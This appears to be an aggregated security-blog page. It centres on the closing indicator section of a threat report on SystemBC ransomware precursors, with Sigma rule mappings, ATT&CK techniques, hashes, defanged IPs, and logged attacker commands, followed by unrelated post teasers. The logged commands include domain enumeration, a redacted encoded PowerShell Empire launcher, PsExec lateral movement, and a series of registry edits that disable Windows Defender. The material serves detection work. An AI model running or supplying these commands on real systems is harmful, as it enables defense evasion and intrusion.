The below table contains the offensive techniques mentioned within this report mapped to open source detection framework Sigma. This framework allows the conversion of detection logic in to many formats for use across a wide range of industry detection tooling. A fidelity rating is included within the rules to provide guidance on how to implement these rules within internal scoring and alerting systems.
n.b. – The fidelity rating may vary dependant on the specifics of your environment
Detection Context
SIGMA Rule
Fidelity
PowerShell Empire Execution
Empire PowerShell Launch Parameters
High
PowerShell Empire Execution
Suspicious PowerShell Invocations – Generic
High
PowerShell Empire Execution
Suspicious PowerShell Parameter Substring
High
PowerShell Empire C2 Traffic
Empire UserAgent URI Combo
High
Ntdsutil Execution
Invocation of Active Directory Diagnostic Tool
High
PsExec Lateral Movement
PsExec Tool Execution
High
PsExec Lateral Movement
PsExec Service Start
High
Malicious Script Execution
Antivirus Relevant File Paths Alerts
High
Comsvcs LSASS Dump
Process Dump via Rundll32 and Comsvcs.dll
High
Disabling Windows Defender
Windows Defender Threat Detection Disabled
High
Nltest Execution
Domain Trust Discovery
Medium
Advanced IP Scanner Execution
Advanced IP Scanner
Medium
NET.exe Domain Enumeration
Suspicious Reconnaissance Activity
Medium
NET.exe Local Enumeration
Local Accounts Discovery
Low
Quick Network Enumeration
Quick Execution of a Series of Suspicious Commands
Low
Tactic
Technique
Technique ID
Initial Access
External Remote Services
T1133
Valid Accounts: Domain Accounts
T1078.002
Trusted Relationship
T1199
Execution
Command & Scripting Interpreter: PowerShell
T1059.001
Command & Scripting Interpreter: Windows Command Shell
T1059.003
Inter-Process Communication: Component Object Model
T1559.001
Native API
T1106
Persistence
Scheduled Task/Job: Scheduled Task
T1053.005
Defense Evasion
Obfuscated Files or Information: Software Packing
T1027.002
Process Injection: Portable Executable Injection
T1055.002
Process Injection: Process Hollowing
T1055.012
Deobfuscate/Decode Files or Information
T1140
Impair Defenses: Disable or Modify Tools
T1562.001
Credential Access
Exploitation for Credential Access
T1212
OS Credential Dumping: LSASS Memory
T1003.001
OS Credential Dumping: NTDS
T1003.003
Discovery
Account Discovery: Domain Account
T1087.002
Domain Trust Discovery
T1482
Network Service Scanning
T1046
Network Share Discovery
T1135
Permission Groups Discovery: Domain Groups
T1069.002
Remote System Discovery
T1018
System Information Discovery
T1082
Lateral Movement
Lateral Tool Transfer
T1570
Remote Services: Remote Desktop Protocol
T1021.001
Remote Services: SMB/Windows Admin Shares
T1021.002
Command and Control
Application Layer Protocol: Web Protocols
T1071.001
Non-Standard Port
T1571
File Name
Context
SHA256
a.ps1
Enumeration Script
B953F255F799D43131FAAB437C22B883B0903704328D58F9AE8111066D7AA1E4
1.ps1
LSASS Dumper
03960062388E8068143FB6CAE203DA2954C3A43BE3306D0D326F015A14019EFF
servers0.bat
Psexec Execution Script
890F5323E870C49C412EECD0417D8E1F22D7FFDB8AED11FAE0810383D7C42B91
svchost.exe
SystemBC Malware
2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580
IP Address
Context
Last Observed
193.29.104[.]187
PowerShell Empire
2021-02-27
79.110.52[.]9
SystemBC
2021-02-27
23.227.202[.]22
SyetemBC
2021-02-27
URL
Last Observed
hXXps://fs12n1.sendspace[.]com/dl/2dcbf9eb9e28920a81febd3f0a8cda84/6039c40226878d2e/px2kd3/1.rar
2021-02-27
hXXps://fs12n5.sendspace[.]com/dl/5593c4325c0f9c23cb59661893ae9454/6039c46105fab7d4/3dugcw/2.zip
2021-02-27
Enumeration:
ping.exe <hostname>
net.exe group “domain computers” /domain
net.exe group “domain admins” /domain
net.exe group “enterprise admins” /domain
net.exe user <USER> /domain
net1.exe group “domain computers” /domain
net1.exe group “domain admins” /domain
net1.exe group “enterprise admins” /domain
net1.exe user <USER> /domain
nltest.exe /dclist:
nltest.exe /dclist:<DOMAIN>Execution:
advanced_ip_scanner.exe /portable “C:/Users/<USER>/Downloads/” /lng en_us
powershell.exe
powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJA<REDACTED>
iexplore.exe http://www.advanced-ip-scanner.com/link.php?lng=en&ver=2-5-3850&beta=n&page=help
cmd.exe /C “C:s$Servers0.bat”
psexec.exe -d \<hostname> -u “<username>” -p “<pass>” -accepteula -s cmd /c “powershell.exe -ExecutionPolicy Bypass -file \<share>l.ps1”
C:UsersPublicMusicsvchost.exe startDefensive Evasion:
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows Defender” /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderMpEngine” /v MpEnablePus /t REG_DWORD /d 0 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReporting” /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderSpyNet” /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderSpyNet” /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderSpyNet” /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg.exe delete “HKLMSoftwarePoliciesMicrosoftWindows Defender” /f
Read More
The post Prelude to Ransomware: SystemBC appeared first on Malware Devil.
For most internet users, there’s not much of a perceivable difference between the domain name they want to visit and the server that the domain queries. That’s because the Domain Name System (DNS) protocol does a good job of seamlessly routing users to different IP addresses that are all associated with a single domain name. […]… Read More
The post NAME:WRECK DNS Bugs: What You Need to Know appeared first on The State of Security.
The post NAME:WRECK DNS Bugs: What You Need to Know appeared first on Security Boulevard.
The post NAME:WRECK DNS Bugs: What You Need to Know appeared first on Malware Devil.
Amidst the pandemic overwhelming the capacity of many hospital systems, malicious hackers have been quick to target healthcare providers and medical agencies. These cyber-attacks have hit both the United States and Europe in recent months, serving as a reminder for organizations to closely review their information security posture during these times of uncertainty. Despite certain […]… Read More
The post Cybersecurity and Compliance for Healthcare Organizations appeared first on The State of Security.
The post Cybersecurity and Compliance for Healthcare Organizations appeared first on Security Boulevard.
The post Cybersecurity and Compliance for Healthcare Organizations appeared first on Malware Devil.
In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...
